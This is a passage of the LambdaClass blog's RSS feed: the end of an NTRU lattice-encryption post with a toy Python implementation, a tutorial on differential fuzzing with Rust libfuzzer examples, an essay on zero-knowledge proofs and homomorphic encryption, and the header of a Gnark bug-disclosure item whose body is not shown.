&lt;p&gt;To encrypt a message, we must first encode it as a polynomial in the ring $\mathcal{R_p}$. As such, it will have coefficients in the range $\{ -(p-1)&#x2F;2, \dots, -1, 0, 1, \dots, (p-1)&#x2F;2\}$ (for odd $p$). We sample some random polynomial $r(x)$ in $\mathcal{T}(d,d)$ and compute the ciphertext as&lt;br &#x2F;&gt;
$c(x) = p h(x) r(x) + m(x) \mod q$&lt;br &#x2F;&gt;
We can see we are adding some “random noise” to the plaintext to hide it.&lt;&#x2F;p&gt;
&lt;p&gt;If we want to decrypt, we first compute&lt;br &#x2F;&gt;
$a (x) = f(x) c(x) \mod q$&lt;br &#x2F;&gt;
$b (x) = F_p (x) a(x) \mod p$&lt;&#x2F;p&gt;
&lt;p&gt;If we choose the parameters correctly, then $b(x) = m(x)$, which we can decode to obtain the message. To specify NTRU, we need to set the values $(n, q, p, d)$, where $n$ and $q$ are coprime and $q &amp;gt; (6 d +1 )p$. To understand why this works, we can look at the calculations in more detail:&lt;br &#x2F;&gt;
$a(x) = f(x) c(x) \mod q$&lt;br &#x2F;&gt;
If we expand $c(x)$,&lt;br &#x2F;&gt;
$a(x) = p f(x) F_q (x) g(x) r(x) + f(x)m(x) \mod q$&lt;br &#x2F;&gt;
but $f(x) F_q (x) \equiv 1 \mod q$, so&lt;br &#x2F;&gt;
$a(x) = p g(x) r(x) + f(x)m(x) \mod q$&lt;br &#x2F;&gt;
The assumption $q &amp;gt; (6d + 1)p$ ensures that the coefficients of the polynomial $a(x)$ are computed exactly, with no wrap-around modulo $q$.&lt;br &#x2F;&gt;
When we apply $F_p (x)$, we get&lt;br &#x2F;&gt;
$b(x) = p F_p (x) g(x) r(x) + F_p (x) f(x) m(x) \mod p$&lt;br &#x2F;&gt;
Given that all the coefficients of $p F_p (x) g(x) r(x)$ are multiples of $p$ (the explicit factor $p$ in the ciphertext ensures this), that polynomial vanishes modulo $p$. We are left with&lt;br &#x2F;&gt;
$b(x) = F_p (x) f(x) m(x) \mod p$&lt;br &#x2F;&gt;
but $F_p (x)$ is the inverse of $f(x)$ in $\mathcal{R_p}$, so&lt;br &#x2F;&gt;
$b(x) = m(x)$&lt;&#x2F;p&gt;
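&lt;p&gt;The whole scheme can be exercised end to end. The following is a toy sketch only, not a secure implementation: the parameters $(n, p, q, d) = (7, 3, 41, 2)$ are our own illustrative choice satisfying $q &amp;gt; (6d+1)p$, and the inversion routine is a plain extended Euclidean algorithm for polynomials over a prime field:&lt;&#x2F;p&gt;

```python
import random

# Toy NTRU walkthrough (illustrative only, not secure). Chosen so that
# q > (6d + 1)p: here (6*2 + 1)*3 = 39 < 41, with n = 7 prime.
n, p, q, d = 7, 3, 41, 2

def conv(a, b, m):
    # multiplication in Z_m[x]/(x^n - 1): cyclic convolution of coefficients
    c = [0] * n
    for i in range(n):
        for j in range(n):
            c[(i + j) % n] = (c[(i + j) % n] + a[i] * b[j]) % m
    return c

def center(a, m):
    # lift coefficients mod m into the symmetric range around 0
    return [((x + m // 2) % m) - m // 2 for x in a]

def poly_divmod(a, b, m):
    # long division of coefficient lists (ascending powers) over the field Z_m
    a, lead_inv = a[:], pow(b[-1], -1, m)
    quo = [0] * max(1, len(a) - len(b) + 1)
    for k in range(len(a) - len(b), -1, -1):
        c = a[k + len(b) - 1] * lead_inv % m
        quo[k] = c
        for j in range(len(b)):
            a[k + j] = (a[k + j] - c * b[j]) % m
    while len(a) > 1 and a[-1] == 0:
        a.pop()
    return quo, a

def inverse(f, m):
    # extended Euclid of f against x^n - 1 over Z_m (m prime here);
    # returns the inverse of f in Z_m[x]/(x^n - 1), or None if there is none
    a = [(m - 1)] + [0] * (n - 1) + [1]        # x^n - 1
    b = [x % m for x in f]
    while len(b) > 1 and b[-1] == 0:
        b.pop()
    s0, s1 = [0], [1]                          # Bezout coefficients on f
    while b != [0]:
        quo, rem = poly_divmod(a, b, m)
        a, b = b, rem
        prod = [0] * (len(quo) + len(s1) - 1)  # prod = quo * s1
        for i, qi in enumerate(quo):
            for j, sj in enumerate(s1):
                prod[i + j] = (prod[i + j] + qi * sj) % m
        width = max(len(s0), len(prod))
        s_new = [((s0[k] if k < len(s0) else 0) -
                  (prod[k] if k < len(prod) else 0)) % m for k in range(width)]
        while len(s_new) > 1 and s_new[-1] == 0:
            s_new.pop()
        s0, s1 = s1, s_new
    if len(a) > 1:
        return None                            # gcd(f, x^n - 1) not constant
    c = pow(a[0], -1, m)                       # normalize the constant gcd
    out = [0] * n
    for i, x in enumerate(s0):
        out[i % n] = (out[i % n] + x * c) % m
    return out

def rand_ternary(d1, d2):
    coeffs = [1] * d1 + [-1] * d2 + [0] * (n - d1 - d2)
    random.shuffle(coeffs)
    return coeffs

random.seed(7)
while True:                                    # key generation
    f = rand_ternary(d + 1, d)
    Fq, Fp = inverse(f, q), inverse(f, p)
    if Fq is not None and Fp is not None:
        break
g = rand_ternary(d, d)
h = conv(Fq, g, q)                             # public key h = F_q * g

m_msg = [1, 0, -1, 1, 0, 0, -1]                # message in R_p, center-lifted
r = rand_ternary(d, d)                         # ephemeral randomness
c_txt = [(p * x + y) % q for x, y in zip(conv(h, r, q), m_msg)]

a_dec = center(conv(f, c_txt, q), q)           # a = f*c mod q, center-lifted
b_dec = center(conv(Fp, a_dec, p), p)          # b = F_p * a mod p
print(b_dec == m_msg)  # True: decryption recovers the message
```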
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Lattice-based cryptography is a promising solution to protect against potential attacks from quantum computers. Lattices are organized arrangements of points in multi-dimensional spaces that form the foundation of lattice-based cryptography. These lattices allow for the construction of encryption schemes. The hardness of specific problems over lattices, such as the Learning With Errors (LWE) problem and the Shortest Vector Problem (SVP), serve as the basis for the security of lattice-based cryptography. These problems are believed to be difficult even for quantum computers, making lattice-based cryptography a compelling option for post-quantum security. In upcoming posts, we will cover more on the fundamentals of lattices and encryption schemes such as CRYSTALs Kyber.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Do You Want Quality Code? Learn How to Use Differential Fuzzers!</title>
          <pubDate>Fri, 14 Apr 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/do-you-want-quality-code-learn-how-to-use-differential-fuzzers/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/do-you-want-quality-code-learn-how-to-use-differential-fuzzers/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/do-you-want-quality-code-learn-how-to-use-differential-fuzzers/">&lt;p&gt;Let’s be honest, who hasn’t missed testing an edge case in their life? Surely it has happened to you, and maybe you realized it months after having implemented it (maybe when it’s already in production!). Some cases escape even the most experienced tester, and to avoid explanations to your manager, today we present the concept of fuzzing, and one of its types: the differential fuzzer.&lt;&#x2F;p&gt;
&lt;p&gt;As stipulated by the OWASP Foundation:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fuzz testing or Fuzzing is a Black Box software testing technique, which consists in finding implementation bugs using malformed&#x2F;semi-malformed data injection in an automated fashion.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Fuzzing is a very efficient technique when looking for errors in our code. This is achieved by generating a massive set of random inputs that are used to test a program. The resulting tests often manage to reach less common cases, the kind that usually goes overlooked.&lt;br &#x2F;&gt;
If you are interested in learning more about the fuzzer concept in general, you can watch the videos we made on the subject: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=z-THCexE4zs&quot;&gt;hacking with fuzzers&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=F3CtyKm7SV4&amp;amp;t=79s&quot;&gt;fuzzing tools&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;However, this tool is not limited to a single program, or to only finding errors that end up causing a crash; we can also compare the outputs of at least two different implementations of the same program and check that they follow the same behavior; this is known as differential fuzzing.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;when-should-we-use-differential-fuzzing&quot;&gt;When should we use differential fuzzing?&lt;&#x2F;h2&gt;
&lt;p&gt;Differential fuzzing applies whenever we have two different implementations of the same algorithm. For example, let’s think about all the different languages in which the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ethereum.org&#x2F;en&#x2F;developers&#x2F;docs&#x2F;evm&#x2F;&quot;&gt;Ethereum Virtual Machine&lt;&#x2F;a&gt; is implemented. The simple magic of the differential fuzzer is to massively test, with different inputs, that all implementations return the same result when running the same process or function. If this is not the case, at least one of the implementations has logic errors and is giving us a result that was not expected.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;structure-of-a-differential-fuzzer&quot;&gt;Structure of a differential fuzzer&lt;&#x2F;h2&gt;
&lt;p&gt;The structure of a differential fuzzer is simple. First, we define which tool we are going to use for fuzzing, since there are many tools for this purpose, like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;google&#x2F;honggfuzz&quot;&gt;Honggfuzz&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rust-fuzz&#x2F;cargo-fuzz&quot;&gt;Cargofuzz&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;google&#x2F;atheris&quot;&gt;Atheris&lt;&#x2F;a&gt; and many more.&lt;&#x2F;p&gt;
&lt;p&gt;Whichever tool you choose (we do not judge preferences here), all tools should provide us with the same thing, a series of random inputs that we will inject into the code to be tested.&lt;&#x2F;p&gt;
&lt;p&gt;With the input provided by the fuzzer, we adapt it to each of the implementations. In this way, both should have the same input at the end, and we tell the fuzzer to return an error if the results differ. This will give us a list of inputs where at least one of the implementations has an error in its logic, giving a different result than the expected one.&lt;&#x2F;p&gt;
&lt;p&gt;For this, we may need intermediate functions to ensure that the result returned by both implementations is comparable.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;example-of-a-differential-fuzzer&quot;&gt;Example of a differential fuzzer&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#![no_main]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use libfuzzer_sys::fuzz_target;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use std::io::prelude::*;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use inflate::inflate_bytes;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use libflate::deflate::Decoder;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; This differential fuzzer panics if two different implementations for deflate&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; decode function returns different results &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fuzz_target!(|data: &amp;amp;[u8]| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut libflate_decoded = Decoder::new(data);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut decoded_data = Vec::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let libflate_res = libflate_decoded.read_to_end(&amp;amp;mut decoded_data).is_ok();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let inflate_decoded = inflate_bytes(data).is_ok();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if libflate_res != inflate_decoded {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    panic!(&amp;quot;differential fuzz failed {}-{}&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            libflate_res, inflate_decoded)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;});&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Above we can see an example of a differential fuzzer, created using the &lt;code&gt;libfuzzer&lt;&#x2F;code&gt; tool for Rust. The structure of the code is simple, and it is the same for any of the fuzzing tools you may want to use.&lt;&#x2F;p&gt;
&lt;p&gt;First, we have the imports that include the implementations we want to compare in our fuzzer. Then we have the function that´s going to run the fuzzer, in this case, is the &lt;code&gt;fuzz_target!()&lt;&#x2F;code&gt; function. This function supplies us with a randomly generated input, in this case, the variable &lt;code&gt;data&lt;&#x2F;code&gt;. With the previous &lt;code&gt;data&lt;&#x2F;code&gt; generated, we run the piece of code that we want to test. In cases like the one in the example code used by &lt;code&gt;libflate,&lt;&#x2F;code&gt; we need to adjust the random &lt;code&gt;data&lt;&#x2F;code&gt; to be received by the code in the first instance. As the last step we do the differential magic, that is, we compare the result returned by the different implementations.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;DzicizT.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In this case, as the image shows, running the fuzzer finds a crash: one of the implementations returns a valid result while the other returns an error.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;inputs-and-outputs&quot;&gt;Inputs and outputs&lt;&#x2F;h2&gt;
&lt;p&gt;Depending on the inputs and outputs of each particular case, we might need to write some extra glue code.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s understand what that means with a simple example. Suppose we are comparing two implementations of some code that receives a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Quadratic_equation&quot;&gt;quadratic equation&lt;&#x2F;a&gt; and a candidate answer, and returns whether the answer satisfies the equation. One implementation receives four numbers corresponding to the coefficients of the equation plus the answer, while the other receives the equation as a string, something like “axx+bx+c=d”.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# Implementation 1 &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def check_if_answer(a, b, c, d, answer):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result = (a * answer**2) + (b * answer) + c&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return result == d&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# Implementation 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def check_if_answer(equation, answer):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    string_without_x = remove_x_from_string(equation) # This returns &amp;quot;a+b+c=d&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    array_of_coefficients = split_string(string_without_x) # This returns [a,b,c,d]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [a, b, c, d] = array_of_coefficients&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result = (a * answer**2) + (b * answer) + c&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return result == d&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To give the different implementations the “same” input we need to adapt the starting input so it’s equivalent for both. We have to do the same with the outputs: one implementation might return True&#x2F;False while the other returns 0&#x2F;1, so we need to normalize the outputs before the equality check can work as intended.&lt;&#x2F;p&gt;
&lt;p&gt;This applies to both regular and differential fuzzers.&lt;&#x2F;p&gt;
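&lt;p&gt;As a small sketch of this kind of adaptation (the implementations and names below are made up for illustration), suppose one implementation reports success as a boolean while the other reports 0&#x2F;1; normalizing one convention onto the other before comparing keeps the differential check meaningful:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Hypothetical pair of implementations with mismatched output conventions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn reference_check(x: u32) -&amp;gt; bool { x % 2 == 0 }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn candidate_check(x: u32) -&amp;gt; u8 { if x % 2 == 0 { 1 } else { 0 } }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Map the 0&#x2F;1 convention onto bool so both outputs are comparable.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn normalize(result: u8) -&amp;gt; bool { result == 1 }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fuzz_target!(|x: u32| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if reference_check(x) != normalize(candidate_check(x)) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        panic!(&amp;quot;differential fuzz failed for input {}&amp;quot;, x)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;});&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;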
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;A differential fuzzer is a very valuable tool when you are writing a new implementation of a process that already has an existing one, to ensure that even the edge cases are handled consistently. It can also help when choosing between several implementations of a solution for your project, by comparing how each one behaves.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Transforming the Future with Zero-Knowledge Proofs, Fully Homomorphic Encryption and new Distributed Systems algorithms</title>
          <pubDate>Thu, 13 Apr 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms/">&lt;p&gt;Disclaimer: To maintain brevity and clarity, we have simplified certain concepts. In this discussion, Zero Knowledge Proofs and Computational Integrity are considered as a single concept, and we will not address the distinct security properties of Proof of Work and Proof of Stake.&lt;&#x2F;p&gt;
&lt;p&gt;The evolution of every scientific discipline or engineering field experiences cycles akin to those observed in economies. Incremental advancements are made daily by corporations, individuals, and academic institutions. Occasionally, a researcher or engineer makes a groundbreaking discovery that alters the course of the field. One such example is Sir Isaac Newton, who made significant contributions to calculus, motion, optics, and gravitation during the time of the bubonic plague, which claimed millions of lives. His relentless pursuit of knowledge throughout the pandemic proved instrumental in shaping the development of mathematics, physics, and engineering. Our comfortable modern lives stand upon the foundation of these monumental discoveries.&lt;&#x2F;p&gt;
&lt;p&gt;The general public is aware of the big breakthroughs made in the aerospace industry, energy production, the Internet of Things, and, last but not least, artificial intelligence. However, most don’t know that during the COVID pandemic, enormous advances were made in cryptography. 47 years ago, Diffie and Hellman wrote in their famous cryptography paper that “we stand today on the brink of a revolution in cryptography”, a revolution that enabled two people to exchange confidential information even when they can only communicate via a channel monitored by an adversary. It enabled electronic commerce and communication between citizens of the free world. We believe the discoveries made by researchers and engineers in cryptography during the COVID pandemic will prove, in the upcoming decades, to be as important as those made by Diffie and Hellman.&lt;&#x2F;p&gt;
&lt;p&gt;One of the big discoveries has been how to make Zero-Knowledge Proofs fast enough for real-world applications. This technology has been around since 1984 but as Diffie also said, “Lots of people working in cryptography have no deep concern with real application issues. They are trying to discover things clever enough to write papers about”. Fortunately for humanity, researchers and engineers have made this technology practical enough in the last decade (especially the last 2 years) to be useful.&lt;&#x2F;p&gt;
&lt;p&gt;The financial system depends on the existence of intermediaries: an army of auditors, regulators, and accountants. The correct working of the financial machine depends on the integrity of its financial institutions. Integrity is maintained due to positive economic incentives, and jail time, fines, and costly lawsuits if the intermediaries don’t do what the state and society expect from them. Bitcoin, a result of the 2008 crisis, created a permissionless financial system where its users can send and receive digital money without intermediaries and without anybody being able to block transactions. In countries like Argentina, Nigeria, or Lebanon, where stagnation and inflation erode citizens’ trust in the financial system and the state, Bitcoin and stablecoins on top of Ethereum are used on a daily basis by the young population to save and to avoid capital controls. In developed countries, their usage is not as massive, since most citizens trust the traditional financial system and the state. However, the world is becoming more complex. Banks are failing in the US and Europe, a new war is taking place in Europe, debt levels are not sustainable in many countries, the fight between the left and the right is retaking the main stage, tensions between the West and the East are increasing, and technological change keeps accelerating.&lt;&#x2F;p&gt;
&lt;p&gt;New applications built on top of unstoppable and trustless technologies that don’t depend on social trust will grow and thrive in this type of environment. Everything is being questioned. Only things that can’t be questioned will fully resist the passage of time. This will happen not only in developing countries but also in developed ones. Systems like Bitcoin, where everyone can verify how it’s running, are more resilient and become more useful by the day in a world that is getting more complex.&lt;&#x2F;p&gt;
&lt;p&gt;Bitcoin’s focus has been to become a new type of monetary asset and financial network. For this reason, the development of more complex programs on top of Bitcoin has always been restricted by design. Newer blockchains like Ethereum added the ability to create new types of applications. DeFi protocols that enabled lending and borrowing, the exchange of digital currencies, and the ability to buy, sell, and trade digital collectibles and art rapidly grew on top of Ethereum. However, creating and transferring relevant amounts of assets on blockchains is costly. The ability to create more complex applications on top of blockchains is also very limited: applications can’t run for more than a few milliseconds on Ethereum.&lt;&#x2F;p&gt;
&lt;p&gt;These systems do not rely on social integrity like traditional systems. Instead, they operate as a permissionless and censorship-resistant network, allowing anyone to add a node and submit updates to its state. To ensure verification, each node must re-execute all transactions, which makes the system decentralized and secure, albeit slower than centralized systems. Consequently, this imposes a limitation on the types of applications that can be built on blockchains. Applications requiring frequent database state updates, such as those exceeding a few times per second, or machine learning algorithms, are not feasible on blockchain platforms.&lt;&#x2F;p&gt;
&lt;p&gt;This is where Zero Knowledge Proofs (ZKPs) and other cryptographic and distributed systems primitives will help society create tools that can be used by everyone. ZKPs enable a party to prove a statement to other parties without revealing any information beyond the statement’s validity. In more concrete terms, this enables a person to show another person that a computation they did is correct, without the other having to redo it and without even having to grant access to the data that was used. An important aspect of this is that verification takes much less time than proving. In even simpler terms: a ZKP proves that the output of a certain computation is correct, and anybody can check the proof far faster than re-running the computation, saving computing time and money.&lt;&#x2F;p&gt;
&lt;p&gt;At first, it’s difficult to grasp, even for engineers, that such a technology is even possible. The mathematics behind it, until recently, seemed magical, and that’s why it was called moon math. Thanks to ZKPs, transferring money in blockchains similar to Bitcoin is cheaper and way faster, since each node no longer needs to re-execute every transaction. Only one node is needed to process all the transactions and prove them using a ZKP, while the rest simply need to verify the proof, saving valuable computing resources. Among other things, ZKPs enable creating a financial system that doesn’t depend on social trust like traditional finance and that doesn’t depend as much on re-executing algorithms as Bitcoin.&lt;&#x2F;p&gt;
&lt;p&gt;Zero Knowledge Proofs facilitate the development of an entirely new range of applications that are executed and proven on a single computer outside the blockchain, with verification occurring within Ethereum. Verifying is far cheaper and faster than proving or executing. Ethereum will evolve from a slow yet secure distributed mainframe, where execution time is shared among all users to run small programs, into a distributed computer that stores and verifies proofs generated externally from the blockchain.&lt;&#x2F;p&gt;
&lt;p&gt;Not only will blockchains benefit from the development of new cryptographic primitives like Zero Knowledge Proofs (ZKPs), but other areas will also be significantly impacted. As AI-generated content begins to overshadow human-generated content on the internet, ZKPs will become essential for verifying that such content was produced by unbiased AI models. “Proof of humanity” systems are already employing ZKPs to verify that it is really a human accessing specific resources.&lt;&#x2F;p&gt;
&lt;p&gt;Hardware is another area where ZKPs will make an impact. Similar to how graphics cards in the 1990s revolutionized the video game industry, zero-knowledge hardware acceleration will be integrated into computers to enhance efficiency.&lt;&#x2F;p&gt;
&lt;p&gt;ZKPs can also be utilized to balance storage and computation securely. For instance, security cameras generate vast amounts of data. ZKPs can provide a compact proof that AI models did not detect any critical information in the video, allowing the system to delete the footage and save storage space.&lt;&#x2F;p&gt;
&lt;p&gt;ZKPs will even be used for national security purposes. As energy production shifts from centralized power plants to distributed sources like solar panels and wind turbines, verifying the proper execution of software on their controllers becomes vital. In the coming decades, ZKPs will play a crucial role in securing these devices.&lt;&#x2F;p&gt;
&lt;p&gt;Software industry regulations are inevitable, and industries such as online casinos and ad networks using Real-Time Bidding protocols will be legally required to demonstrate that they have not deceived their clients. Laws protecting users from large tech corporations are already in place in Europe, partly due to concerns about data misuse by foreign powers to influence political campaigns.&lt;&#x2F;p&gt;
&lt;p&gt;Requirements for secure storage and processing of encrypted data will become increasingly necessary. Fully Homomorphic Encryption (FHE), a technology akin to ZKPs, will be one of the tools utilized for this purpose. FHE enables computation on encrypted data, ensuring privacy. As FHE becomes more efficient and practical, most databases will integrate some FHE functionality, preventing administrators from accessing user data directly.&lt;&#x2F;p&gt;
&lt;p&gt;Zero-knowledge proofs (ZKPs), which generate evidence for a third party to confirm the accurate execution of a computation, and Fully Homomorphic Encryption (FHE), which enables calculations on encrypted data, will be combined with distributed systems algorithms that are capable of tolerating significant network failures similar to those employed by Bitcoin. Together they will be utilized to comply with regulations while creating trustless applications.&lt;&#x2F;p&gt;
&lt;p&gt;In the past decade, we have successfully launched applications serving dozens of millions of users. Leveraging our expertise, we are now dedicated to providing both technical and financial support to help others create startups focused on developing and implementing these vital technologies. As society grapples with the challenges of our rapidly evolving world these innovations will prove to be indispensable.&lt;&#x2F;p&gt;
&lt;p&gt;Federico Carrone.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to use ConsenSys&#x27;s Gnark Zero Knowledge Proof library and disclosure of a DoS bug</title>
          <pubDate>Fri, 17 Mar 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-use-the-consenyss-gnark-zero-knowledge-proof-library-and-disclosure-of-a-ddos-bug/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-use-the-consenyss-gnark-zero-knowledge-proof-library-and-disclosure-of-a-ddos-bug/</guid>
